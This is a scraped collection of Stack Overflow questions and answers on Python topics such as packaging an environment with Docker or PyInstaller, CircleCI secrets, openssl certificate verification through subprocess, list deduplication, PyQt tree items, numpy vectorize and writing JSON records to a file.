<p>I have a python env and code that runs on that env. I have code to set up this env using wget and such, but that's not really OS independent.</p> <p>I wish to bundle this env and code into one bundle and distribute it, so the user doesn't have to set up the env before running the code.</p> <p>Basically, give the end user something (executable, tar, zip, .py), and after running/extracting it the user should be able to run my main python script.</p> <p>I looked into wheels, but I'm not sure if that solves the purpose.</p>
0
2016-08-01T22:28:22Z
38,709,130
<p>If the code is run on a server you should consider using <a href="https://www.docker.com" rel="nofollow">docker</a> and <a href="https://docs.docker.com/compose/overview/" rel="nofollow">docker-compose</a>.</p> <p>This technology allows you to define the entire setup in config-files, and the only thing you need to do when you deploy your code on a new server is to run a single command (<code>docker-compose up</code>)</p>
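As an illustration only (the service name, build context, and command below are hypothetical, since the question gives no project details), a minimal docker-compose.yml for a Python app could look like:

```yaml
version: '2'
services:
  app:
    build: .              # a Dockerfile in the project root sets up the env
    command: python main.py
```

Running `docker-compose up` then builds the environment and starts the script in one step.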
1
2016-08-01T22:35:28Z
[ "python", "python-packaging" ]
What's the preferred python distribution if I want to package my env and code into one bundle
38,709,071
<p>I have a python env and code that runs on that env. I have code to set up this env using wget and such, but that's not really OS independent.</p> <p>I wish to bundle this env and code into one bundle and distribute it, so the user doesn't have to set up the env before running the code.</p> <p>Basically, give the end user something (executable, tar, zip, .py), and after running/extracting it the user should be able to run my main python script.</p> <p>I looked into wheels, but I'm not sure if that solves the purpose.</p>
0
2016-08-01T22:28:22Z
38,754,968
<p>Decided to use <a href="http://www.pyinstaller.org/" rel="nofollow">Pyinstaller</a>. Seems straightforward and under active development.</p>
0
2016-08-03T22:58:49Z
[ "python", "python-packaging" ]
Duck typing and foreign objects
38,709,075
<p>I'm currently replicating something similar to this question: <a href="http://stackoverflow.com/questions/2351525/python-switch-by-class-name">python switch by class name?</a></p> <p>I have a for loop that iterates over a set of objects and sorts them, by their type, into one of several lists.</p> <pre><code>for obj in list_of_things: if isinstance(obj, Class1): class1list.append(obj) if isinstance(obj, Class2): class2list.append(obj) </code></pre> <p>etc. for several other classes. The application is something like an ORM - data from each class will be extracted and written to a database, and each class has different data to extract. Additionally, it is necessary that all instances of Class1 be processed by the ORM before any instances of Class2.</p> <p>Lastly, Class1 and Class2 are not mine - they're the output of an API that I'm using, so I have no ability to change them as is suggested in the previous question (like, writing a serialize() method that dumps the data I need in each class). I make a request to the API for some objects, and it floods me with objects of various types, from each of which I need to extract different data.</p> <p>Is there a more pythonic way of doing this? This approach meets the need, but it hurts my eyes and I'd like to learn a better way. I'm pretty new to Python still.</p>
1
2016-08-01T22:28:53Z
38,709,360
<p>Another approach, depending on your specifics, might make use of the fact that the <code>type</code> type is immutable, and thus able to be used as a dictionary key.</p> <p>So you could do something like:</p> <pre><code>from collections import defaultdict list_of_things = [2, 3, "Some", "String"] obj_map = defaultdict(list) for obj in list_of_things: obj_map[type(obj)].append(obj) print(obj_map) </code></pre> <p>Output:</p> <pre><code>defaultdict(&lt;type 'list'&gt;, { &lt;type 'int'&gt;: [2, 3], &lt;type 'str'&gt;: ['Some', 'String'] }) </code></pre> <p>The idea here is that you don't need to write a whole bunch of <code>if isinstance</code> tests, you just "group by" each object's type.</p> <p>You can access values of the dictionary by using the class name as the key:</p> <pre><code>print(obj_map[int]) # [2, 3] </code></pre>
0
2016-08-01T23:01:28Z
[ "python", "serialization", "duck-typing" ]
use environment variables in CircleCI
38,709,099
<p>I'm trying to use CircleCI to run automated tests. I have a config.yml file that contains secrets that I don't want to upload to my repo for obvious reasons. </p> <p>Thus I've created a set of env variables in the Project Settings section:</p> <pre><code>VR_API_KEY = some_value CLARIFAI_CLIENT_ID = some_value CLARIFAI_CLIENT_SECRET = some_value IMAGGA_API_KEY = some_value IMAGGA_API_SECRET = some_value </code></pre> <p>In config.yml I've removed the actual values, and it looks like this:</p> <pre><code>visual-recognition: api-key: ${VR_API_KEY} clarifai: client-id: ${CLARIFAI_CLIENT_ID} client-secret: ${CLARIFAI_CLIENT_SECRET} imagga: api-key: ${IMAGGA_API_KEY} api-secret: ${IMAGGA_API_SECRET} </code></pre> <p>I have a test that basically creates the API client instances and configures everything. This test fails because it looks like CircleCI is not correctly substituting the values...here is the output of some prints (this is just when the values are read from config.yml)</p> <pre><code>-------------------- &gt;&gt; begin captured stdout &lt;&lt; --------------------- Checking tagger queries clarifai API ${CLARIFAI_CLIENT_ID} ${CLARIFAI_CLIENT_SECRET} COULD NOT LOAD: 'UNAUTHORIZED' --------------------- &gt;&gt; end captured stdout &lt;&lt; ---------------------- </code></pre> <p>The COULD NOT LOAD: 'UNAUTHORIZED' is expected since invalid credentials lead to OAuth dance failure.</p> <p>Any clues? 
Thanks!</p> <p>The output above means there is no substitution, and therefore all tests will fail. What am I doing wrong here? By the way, I don't have a circle.yml file yet; do I need one?</p> <p><strong>EDIT:</strong> If anyone runs into the same problem, the solution was rather simple: I've simply encrypted the config.yml file as described here</p> <p><a href="https://github.com/circleci/encrypted-files" rel="nofollow">https://github.com/circleci/encrypted-files</a></p> <p>Then in circle.yml just add an instruction to decrypt it and name the output file config.yml...and that's it!</p> <pre><code>dependencies: pre: # update locally with: # openssl aes-256-cbc -e -in secret-env-plain -out secret-env-cipher -k $KEY - openssl aes-256-cbc -d -in config-cipher -k $KEY &gt;&gt; config.yml </code></pre>
0
2016-08-01T22:31:21Z
39,110,894
<p>CircleCI also supports putting in environment variables (<a href="https://circleci.com/docs/environment-variables/" rel="nofollow">CircleCI Environment Variables</a>). Instead of putting the value of the environment variable in the code, you go to project settings -> Environment Variables. Then just click add variable with name and value. You access the environment variable normally through the name.</p>
0
2016-08-23T21:22:46Z
[ "python", "circleci" ]
Running subprocesses command with two string inputs
38,709,118
<p>I'm trying to validate a certificate with a CA bundle file. The original Bash command takes two file arguments like this;</p> <pre><code>openssl verify -CAfile ca-ssl.ca cert-ssl.crt </code></pre> <p>I'm trying to figure out how to run the above command in python subprocess whilst having ca-ssl.ca and cert-ssl.crt as variable strings (as opposed to files). </p> <p>If I ran the command with variables (instead of files) in bash then this would work;</p> <pre><code>ca_value=$(&lt;ca-ssl.ca) cert_value=$(&lt;cert-ssl.crt) openssl verify -CAfile &lt;(echo "$ca_value") &lt;(echo "$cert_value") </code></pre> <p>However, I'm struggling to figure out how to do the above with Python, preferably without needing to use <code>shell=True</code>. I have tried the following but doesn't work and instead prints 'help' commands for openssl;</p> <pre><code>certificate = ''' cert string ''' ca_bundle = ''' ca bundle string ''' def ca_valid(cert, ca): ca_validation = subprocess.Popen(['openssl', 'verify', '-CAfile', ca, cert], stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1) ca_validation_output = ca_validation.communicate()[0].strip() ca_validation.wait() ca_valid(certificate, ca_bundle) </code></pre> <p>Any guidance/clues on what I need to look further into would be appreciated. </p>
3
2016-08-01T22:33:53Z
38,709,397
<p>If you want to use process substitution, you will <em>have</em> to use <code>shell=True</code>. This is unavoidable. The <code>&lt;(...)</code> process substitution syntax is bash syntax; you simply must call bash into service to parse and execute such code.</p> <p>Additionally, you have to ensure that <code>bash</code> is invoked, as opposed to <code>sh</code>. On some systems <code>sh</code> may refer to an old Bourne shell (as opposed to the Bourne-again shell <code>bash</code>) in which case process substitution will definitely not work. On some systems <code>sh</code> will invoke <code>bash</code>, but process substitution will still not work, because when invoked under the name <code>sh</code> the <code>bash</code> shell enters something called POSIX mode. Here are some excerpts from the <code>bash</code> man page:</p> <blockquote> <p>...</p> <p>INVOCATION</p> <p>... When invoked as sh, bash enters posix mode after the startup files are read. ....</p> <p>...</p> <p>SEE ALSO</p> <p>...</p> <p><a href="http://tiswww.case.edu/~chet/bash/POSIX" rel="nofollow">http://tiswww.case.edu/~chet/bash/POSIX</a> -- a description of posix mode</p> <p>...</p> </blockquote> <p>From the above web link:</p> <blockquote> <ol start="28"> <li>Process substitution is not available.</li> </ol> </blockquote> <p><code>/bin/sh</code> seems to be the default shell in python, whether you're using <code>os.system()</code> or <code>subprocess.Popen()</code>. 
So you'll have to specify the argument <code>executable='bash'</code>, or <code>executable='/bin/bash'</code> if you want to specify the full path.</p> <p>This is working for me:</p> <pre><code>subprocess.Popen('printf \'argument: "%s"\\n\' verify -CAfile &lt;(echo ca_value) &lt;(echo cert_value);',executable='bash',shell=True).wait(); ## argument: "verify" ## argument: "-CAfile" ## argument: "/dev/fd/63" ## argument: "/dev/fd/62" ## 0 </code></pre> <hr> <p>Here's how you can actually embed the string values from variables:</p> <pre><code>bashEsc = lambda s: "'"+s.replace("'","'\\''")+"'"; ca_value = 'x'; cert_value = 'y'; cmd = 'printf \'argument: "%%s"\\n\' verify -CAfile &lt;(echo %s) &lt;(echo %s);'%(bashEsc(ca_value),bashEsc(cert_value)); subprocess.Popen(cmd,executable='bash',shell=True).wait(); ## argument: "verify" ## argument: "-CAfile" ## argument: "/dev/fd/63" ## argument: "/dev/fd/62" ## 0 </code></pre>
-2
2016-08-01T23:05:29Z
[ "python", "bash", "variables", "subprocess" ]
Running subprocesses command with two string inputs
38,709,118
<p>I'm trying to validate a certificate with a CA bundle file. The original Bash command takes two file arguments like this;</p> <pre><code>openssl verify -CAfile ca-ssl.ca cert-ssl.crt </code></pre> <p>I'm trying to figure out how to run the above command in python subprocess whilst having ca-ssl.ca and cert-ssl.crt as variable strings (as opposed to files). </p> <p>If I ran the command with variables (instead of files) in bash then this would work;</p> <pre><code>ca_value=$(&lt;ca-ssl.ca) cert_value=$(&lt;cert-ssl.crt) openssl verify -CAfile &lt;(echo "$ca_value") &lt;(echo "$cert_value") </code></pre> <p>However, I'm struggling to figure out how to do the above with Python, preferably without needing to use <code>shell=True</code>. I have tried the following but doesn't work and instead prints 'help' commands for openssl;</p> <pre><code>certificate = ''' cert string ''' ca_bundle = ''' ca bundle string ''' def ca_valid(cert, ca): ca_validation = subprocess.Popen(['openssl', 'verify', '-CAfile', ca, cert], stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1) ca_validation_output = ca_validation.communicate()[0].strip() ca_validation.wait() ca_valid(certificate, ca_bundle) </code></pre> <p>Any guidance/clues on what I need to look further into would be appreciated. </p>
3
2016-08-01T22:33:53Z
38,861,639
<p>Bash process substitution <code>&lt;(...)</code> in the end is supplying a file path as an argument to <code>openssl</code>. </p> <p>You will need to make a helper function to create this functionality since Python doesn't have any operators that allow you to inline pipe data into a file and present its path:</p> <pre><code>import subprocess def validate_ca(cert, ca): with filearg(ca) as ca_path, filearg(cert) as cert_path: ca_validation = subprocess.Popen( ['openssl', 'verify', '-CAfile', ca_path, cert_path], stdout=subprocess.PIPE, ) return ca_validation.communicate()[0].strip() </code></pre> <p>Where <code>filearg</code> is a context manager which creates a named temporary file with your desired text, closes it, hands the path to you, and then removes it after the <code>with</code> scope ends.</p> <pre><code>import os import tempfile from contextlib import contextmanager @contextmanager def filearg(txt): with tempfile.NamedTemporaryFile('w', delete=False) as fh: fh.write(txt) try: yield fh.name finally: os.remove(fh.name) </code></pre> <p>Anything accessing this temporary file (like the subprocess) needs to work inside the context manager.</p> <p>By the way, the <code>Popen.wait(self)</code> is redundant since <code>Popen.communicate(self)</code> waits for termination.</p>
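Note that the decorator must be spelled `@contextmanager`. Here is a self-contained check of the helper on its own, with a plain `open()` standing in for the `openssl` subprocess:

```python
import os
import tempfile
from contextlib import contextmanager

@contextmanager
def filearg(txt):
    # write the text to a named temp file and hand back its path
    with tempfile.NamedTemporaryFile('w', delete=False) as fh:
        fh.write(txt)
    try:
        yield fh.name
    finally:
        os.remove(fh.name)

with filearg("hello cert data") as path:
    with open(path) as f:
        content = f.read()   # the subprocess would read this same path

assert content == "hello cert data"
assert not os.path.exists(path)   # cleaned up once the with block exits
```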
1
2016-08-09T22:49:00Z
[ "python", "bash", "variables", "subprocess" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicates of the old list. This is the code, but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing: I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I coded this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And it works perfectly.</p>
1
2016-08-01T22:37:14Z
38,709,214
<pre><code>def distinct(lst): dlst = [] for val in lst: if val not in dlst: dlst.append(val) return dlst </code></pre>
3
2016-08-01T22:44:46Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicates of the old list. This is the code, but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing: I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I coded this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And it works perfectly.</p>
1
2016-08-01T22:37:14Z
38,709,227
<p>Is this considered cheating?</p> <pre><code>&gt;&gt;&gt; distinct = lambda lst: list(set(lst)) &gt;&gt;&gt; distinct([1,3,1,2,6]) [1, 2, 3, 6] &gt;&gt;&gt; distinct(['a','ab','a','ab']) ['a', 'ab'] </code></pre>
2
2016-08-01T22:46:25Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicates of the old list. This is the code, but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing: I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I coded this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And it works perfectly.</p>
1
2016-08-01T22:37:14Z
38,709,233
<p>If order isn't important, you can cast it to a <code>set</code>, then back to a <code>list</code></p> <pre><code>def distinct(lst): return list(set(lst)) </code></pre>
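A quick demonstration of both the deduplication and the caveat (the order of a `set` is arbitrary, so only compare after sorting):

```python
def distinct(lst):
    return list(set(lst))

result = distinct([1, 3, 1, 2, 6])
assert sorted(result) == [1, 2, 3, 6]   # duplicates gone
assert len(result) == 4                 # but original order is not guaranteed
```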
1
2016-08-01T22:46:47Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicates of the old list. This is the code, but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing: I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I coded this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And it works perfectly.</p>
1
2016-08-01T22:37:14Z
38,709,889
<p>If you need to eliminate duplicates AND preserve order you can do this:</p> <pre><code>def distinct(lst): seen = set() for item in lst: if item not in seen: yield item seen.add(item) </code></pre> <hr> <pre><code>a = [1,3,1,2,6] print(list(distinct(a))) [1,3,2,6] </code></pre> <hr> <pre><code>b = ['a','ab','a','ab'] print(list(distinct(b))) ['a', 'ab'] </code></pre> <p>See a demo here: <a href="https://ideone.com/a2khCg" rel="nofollow">https://ideone.com/a2khCg</a></p>
0
2016-08-02T00:11:33Z
[ "python", "python-2.7" ]
How can I write a list without duplicate with only for, if and boolean
38,709,150
<p>My professor gave me an exercise where I write a function that returns a list without the duplicates of the old list. This is the code, but I don't know how to write the method without using <code>.remove()</code>:</p> <pre><code>def distinct(lst): lstnew = [] c = range(len(lst)) for i in range(len(lst)): if i in range(len(lst)) != c: lstnew += [i] c += 1 return lstnew print distinct([1,3,1,2,6]) print distinct([['a','ab','a','ab']]) </code></pre> <p>I forgot to write an important thing: I must preserve order in the output list.</p> <p>[UPDATE] After I read the answer of Jai Srivastav I coded this:</p> <pre><code>def distinct(lst): lstnew = [] for element in lst: if element not in lstnew: lstnew = lstnew + [element] return lstnew </code></pre> <p>And it works perfectly.</p>
1
2016-08-01T22:37:14Z
38,714,922
<p>There are excellent solutions here that I have already applied, but my professor told us that we must not use the methods of the list. Has anyone else got any more thoughts?</p>
0
2016-08-02T08:02:14Z
[ "python", "python-2.7" ]
Copy QTreeWidgetItem from QPushButton item widget
38,709,274
<p>I'd like to copy a QTreeWidgetItem if a push-button inside it is pushed.</p> <p>So far I've got:</p> <pre><code>def Copy(self): obj = self.sender() self.Tree = qt.QTreeWidget(self) self.Tree.setHeaderLabels(["Name"]) item = qt.QTreeWidgetItem("Name") self.Tree.addTopLevelItem(item) childItem = qt.QTreeWidgetItem("Name") #&lt;------- This I'd like to copy item.addChild(childItem) bttn = qt.QPushButton("Copy This Widget", self) bttn.clicked.connect(self.Copy) self.Tree.setItemWidget(childItem, 1, bttn) </code></pre> <p>I'd like to be able to copy <code>childItem</code>, so that I may place it in a QTreeWidget.</p>
0
2016-08-01T22:51:30Z
38,709,327
<p>There's no direct way to get the <code>QTreeWidgetItem</code> from its item-widget, so you will have to explicitly store the index somewhere so that it can be accessed later.</p> <p>One way to do this is to add the index to the item-widget as a property:</p> <pre><code>bttn = qt.QPushButton("Copy This Widget", self) index = QtCore.QPersistentModelIndex(self.Tree.indexFromItem(childItem)) bttn.setProperty('index', index) ... def Copy(self): index = self.sender().property('index') if index.isValid(): copyItem = qt.QTreeWidgetItem(self.Tree.itemFromIndex(index)) </code></pre>
1
2016-08-01T22:58:10Z
[ "python", "pyqt", "qtreewidgetitem" ]
Converting image file from attachment to Pdf file in python
38,709,298
<p>I am trying to convert images from the attachments of a .msg file and save them into a PDF file. However, I get an error when I try to read the image file for conversion into a PDF file. Here is the part of my code:</p> <pre><code>if count_attachments &gt; 0: for item in range(count_attachments): attached = msg.Attachments.Item(item + 1) extension = attached.filename.split(".")[-1] if extension == 'jpg' or extension == 'png': pp = PdfPages(newname) img_data = open(attached, 'rb').read() pp.savefig(img_data) pp.close() </code></pre> <p>Here is the error I get:</p> <pre><code>Traceback (most recent call last): File "email-reader1.py", line 52, in &lt;module&gt; img_data = open(attached, 'rb').read() TypeError: Can't convert 'CDispatch' object to str implicitly </code></pre>
0
2016-08-01T22:54:10Z
38,709,344
<p>Replace the line:<br> <code>img_data = open(attached, 'rb').read()</code> </p> <p>with:<br> <code>img_data = open(attached.filename, 'rb').read()</code></p>
0
2016-08-01T23:00:03Z
[ "python", "python-3.x", "pdf" ]
numpy vectorize multidimensional function
38,709,313
<p>I am having problems to vectorize a multidimensional function.<br> Consider the following example:</p> <pre><code>def _cost(u): return u[0] - u[1] cost = np.vectorize(_cost) &gt;&gt;&gt; x = np.random.normal(0, 1,(10, 2)) &gt;&gt;&gt; cost(x) Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2218, in __call__ return self._vectorize_call(func=func, args=vargs) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2281, in _vectorize_call ufunc, otypes = self._get_ufunc_and_otypes(func=func, args=args) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2243, in _get_ufunc_and_otypes outputs = func(*inputs) TypeError: _cost() missing 1 required positional argument: 'v' </code></pre> <p>Background information: I encountered the problem while trying to generalize the following code (Particle Swarm Optimization Algorithm) to multivariate data:</p> <pre><code>import numpy as np import matplotlib.pyplot as plt def pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1=1, f2=1, verbose=False): best_scores = np.array([np.inf]*n_particles) best_positions = np.zeros(shape=(n_particles, space_dimension)) particles = np.random.uniform(left_lim, right_lim, (n_particles, space_dimension)) velocities = np.zeros(shape=(n_particles, space_dimension)) for i in range(sim): particles = particles + velocities print(particles) scores = cost(particles).ravel() better_positions = np.argwhere(scores &lt; best_scores).ravel() best_scores[better_positions] = scores[better_positions] best_positions[better_positions, :] = particles[better_positions, :] g = best_positions[np.argmin(best_scores), :] u1 = np.random.uniform(0, f1, (n_particles, 1)) u2 = np.random.uniform(0, f2, (n_particles, 1)) velocities = 
velocities + u1 * (best_positions - particles) + u2 * (g - particles) if verbose and i % 50 == 0: print('it=', i, ' score=', cost(g)) x = np.linspace(-5, 20, 1000) y = cost(x) plt.plot(x, y) plt.plot(particles, cost(particles), 'o') plt.vlines(g, y.min()-2, y.max()) plt.show() return g, cost(g) def test_pso_1_dim(): def _cost(x): if 0 &lt; x &lt; 15: return np.sin(x)*x else: return 15 + np.min([np.abs(x-0), np.abs(x-15)]) cost = np.vectorize(_cost) sim = 100 space_dimension = 1 n_particles = 5 left_lim, right_lim = 0, 15 f1, f2 = 1, 1 x, cost_x = pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1, f2, verbose=False) x0 = 11.0841839 assert np.abs(x - x0) &lt; 0.01 return </code></pre> <p>Please advise me if vectorization is not a good idea in this case. </p>
0
2016-08-01T22:55:45Z
38,709,406
<p>As mentioned in the notes for <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.vectorize.html" rel="nofollow"><code>vectorize</code></a>: </p> <blockquote> <p>The vectorize function is provided primarily for convenience, not for performance. The implementation is essentially a for loop.</p> </blockquote> <p>So while vectorizing your code may be a good idea via <code>numpy</code> types and functions, you probably shouldn't do this using <code>numpy.vectorize</code>. </p> <p>For the example you gave, your <code>cost</code> might be simply and efficiently calculated as a function operating on a <code>numpy</code> array: </p> <pre><code>def cost(x): # Create the empty output output = np.empty(x.shape) # Select the first group using a boolean array group1 = (0 &lt; x) &amp; (x &lt; 15) output[group1] = np.sin(x[group1])*x[group1] # Select second group as inverse (logical not) of group1 output[~group1] = 15 + np.min( [np.abs(x[~group1]-0), np.abs(x[~group1]-15)], axis=0) return output </code></pre>
0
2016-08-01T23:07:14Z
[ "python", "arrays", "numpy", "multidimensional-array", "vectorization" ]
numpy vectorize multidimensional function
38,709,313
<p>I am having problems to vectorize a multidimensional function.<br> Consider the following example:</p> <pre><code>def _cost(u): return u[0] - u[1] cost = np.vectorize(_cost) &gt;&gt;&gt; x = np.random.normal(0, 1,(10, 2)) &gt;&gt;&gt; cost(x) Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2218, in __call__ return self._vectorize_call(func=func, args=vargs) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2281, in _vectorize_call ufunc, otypes = self._get_ufunc_and_otypes(func=func, args=args) File "/Users/lucapuggini/MyApps/scientific_python_3_5/lib/python3.5/site-packages/numpy/lib/function_base.py", line 2243, in _get_ufunc_and_otypes outputs = func(*inputs) TypeError: _cost() missing 1 required positional argument: 'v' </code></pre> <p>Background information: I encountered the problem while trying to generalize the following code (Particle Swarm Optimization Algorithm) to multivariate data:</p> <pre><code>import numpy as np import matplotlib.pyplot as plt def pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1=1, f2=1, verbose=False): best_scores = np.array([np.inf]*n_particles) best_positions = np.zeros(shape=(n_particles, space_dimension)) particles = np.random.uniform(left_lim, right_lim, (n_particles, space_dimension)) velocities = np.zeros(shape=(n_particles, space_dimension)) for i in range(sim): particles = particles + velocities print(particles) scores = cost(particles).ravel() better_positions = np.argwhere(scores &lt; best_scores).ravel() best_scores[better_positions] = scores[better_positions] best_positions[better_positions, :] = particles[better_positions, :] g = best_positions[np.argmin(best_scores), :] u1 = np.random.uniform(0, f1, (n_particles, 1)) u2 = np.random.uniform(0, f2, (n_particles, 1)) velocities = 
velocities + u1 * (best_positions - particles) + u2 * (g - particles) if verbose and i % 50 == 0: print('it=', i, ' score=', cost(g)) x = np.linspace(-5, 20, 1000) y = cost(x) plt.plot(x, y) plt.plot(particles, cost(particles), 'o') plt.vlines(g, y.min()-2, y.max()) plt.show() return g, cost(g) def test_pso_1_dim(): def _cost(x): if 0 &lt; x &lt; 15: return np.sin(x)*x else: return 15 + np.min([np.abs(x-0), np.abs(x-15)]) cost = np.vectorize(_cost) sim = 100 space_dimension = 1 n_particles = 5 left_lim, right_lim = 0, 15 f1, f2 = 1, 1 x, cost_x = pso(cost, sim, space_dimension, n_particles, left_lim, right_lim, f1, f2, verbose=False) x0 = 11.0841839 assert np.abs(x - x0) &lt; 0.01 return </code></pre> <p>Please advise me if vectorization is not a good idea in this case. </p>
0
2016-08-01T22:55:45Z
38,709,980
<p><code>np.vectorize</code> feeds scalars to your function. For example:</p> <pre><code>In [1090]: def _cost(u): ...: return u*2 In [1092]: cost=np.vectorize(_cost) In [1093]: cost(np.arange(10) ...: ) Out[1093]: array([ 0, 2, 4, 6, 8, 10, 12, 14, 16, 18]) In [1094]: cost(np.ones((3,4))) Out[1094]: array([[ 2., 2., 2., 2.], [ 2., 2., 2., 2.], [ 2., 2., 2., 2.]]) </code></pre> <p>But your function acts as though it is getting a list or array with 2 values. What were you intending?</p> <p>A function with 2 scalars:</p> <pre><code>In [1095]: def _cost(u,v): ...: return u+v ...: ...: In [1096]: cost=np.vectorize(_cost) In [1098]: cost(np.arange(3),np.arange(3,6)) Out[1098]: array([3, 5, 7]) In [1099]: cost([[1],[2]],np.arange(3,6)) Out[1099]: array([[4, 5, 6], [5, 6, 7]]) </code></pre> <p>Or with your 2 column <code>x</code>:</p> <pre><code>In [1103]: cost(x[:,0],x[:,1]) Out[1103]: array([-1.7291913 , -0.46343403, 0.61574928, 0.9864683 , -1.22373097, 1.01970917, 0.22862683, -0.11653917, -1.18319723, -3.39580376]) </code></pre> <p>which is the same as doing an array sum on axis 1</p> <pre><code>In [1104]: x.sum(axis=1) Out[1104]: array([-1.7291913 , -0.46343403, 0.61574928, 0.9864683 , -1.22373097, 1.01970917, 0.22862683, -0.11653917, -1.18319723, -3.39580376]) </code></pre>
0
2016-08-02T00:22:28Z
[ "python", "arrays", "numpy", "multidimensional-array", "vectorization" ]
Appending Multiple Text Files using Dictionaries Python
38,709,322
<p>I am currently working on some Data Analytics work and I'm having a bit of trouble with the Data Preprocessing.</p> <p>I have compiled a folder of text files, with the name of the text file being the date that the text file corresponds to. I was originally able to append all of the text files to one document, but I wanted to use a dictionary in order to have 2 attributes, the filename (also the date) and the content in the text file.</p> <p>This is the code:</p> <pre><code>import json import os import math # Define output filename OutputFilename = 'finalv2.txt' # Define path to input and output files InputPath = 'C:/Users/Mike/Desktop/MonthlyOil/TextFiles' OutputPath = 'C:/Users/Mike/Desktop/MonthlyOil/' # Convert forward/backward slashes InputPath = os.path.normpath(InputPath) OutputPath = os.path.normpath(OutputPath) # Define output file and open for writing filename = os.path.join(OutputPath,OutputFilename) file_out = open(filename, 'w') print ("Output file opened") size = math.inf def append_record(record): with open('finalv2.txt', 'a') as f: json.dump(record, f) f.write(json.dumps(record)) # Loop through each file in input directory for file in os.listdir(InputPath): # Define full filename filename = os.path.join(InputPath,file) if os.path.isfile(filename): print (" Adding :" + file) file_in = open(filename, 'r') content = file_in.read() dict = {'filename':filename,'content':content} print ("dict['filename']: ", dict['filename'] ) append_record(dict) file_in.close() # Close output file file_out.close() print ("Output file closed") </code></pre> <p>The problem I am experiencing is that it won't append to my file. I have a line in there which tests whether or not the dict contains anything, and it does; I have tested both content and filename.</p> <p>Any ideas what I'm missing to get the dict appended to the file?</p>
0
2016-08-01T22:57:09Z
38,709,528
<p>There are many issues, but the one that is causing the trouble here is that you're opening <code>finalv2.txt</code> twice. Once with mode <code>w</code> (and doing nothing with it), and again inside <code>append_record()</code>, this time with mode <code>a</code>.</p> <p>Consider the following:</p> <pre><code>import json import os import math # Define output filename OutputFilename = 'finalv2.txt' # Define path to input and output files InputPath = 'C:/Users/Mike/Desktop/MonthlyOil/TextFiles' OutputPath = 'C:/Users/Mike/Desktop/MonthlyOil/' # Convert forward/backward slashes InputPath = os.path.normpath(InputPath) OutputPath = os.path.normpath(OutputPath) # Define output file out_file = os.path.join(OutputPath,OutputFilename) size = None def append_record(fn, record): with open(fn, 'a') as f: json.dump(record, f) #f.write(json.dumps(record)) # Loop through each file in input directory for fn in os.listdir(InputPath): # Define full filename in_file = os.path.join(InputPath,fn) if os.path.isfile(in_file): print(" Adding: " + fn) with open(in_file, 'r') as file_in: content = file_in.read() d = {'filename':in_file, 'content':content} print("d['filename']: ", d['filename'] ) append_record(out_file, d) </code></pre> <p>Which works as you expected.</p> <p>Here:</p> <ul> <li>Files aren't explicitly opened and closed, they're managed by context managers (<code>with</code>)</li> <li>There are no longer variables named <code>dict</code> and <code>file</code></li> <li>You define <code>finalv2.txt</code> in one place, and one place only</li> <li><code>filename</code> is not defined twice, once as the output file and then again as the input file. Instead there are <code>out_file</code> and <code>in_file</code></li> <li>You pass the output filename to your <code>append_record</code> function</li> <li>You don't (attempt to) append the json twice -- only once (you can pick which method you prefer, they both work)</li> </ul>
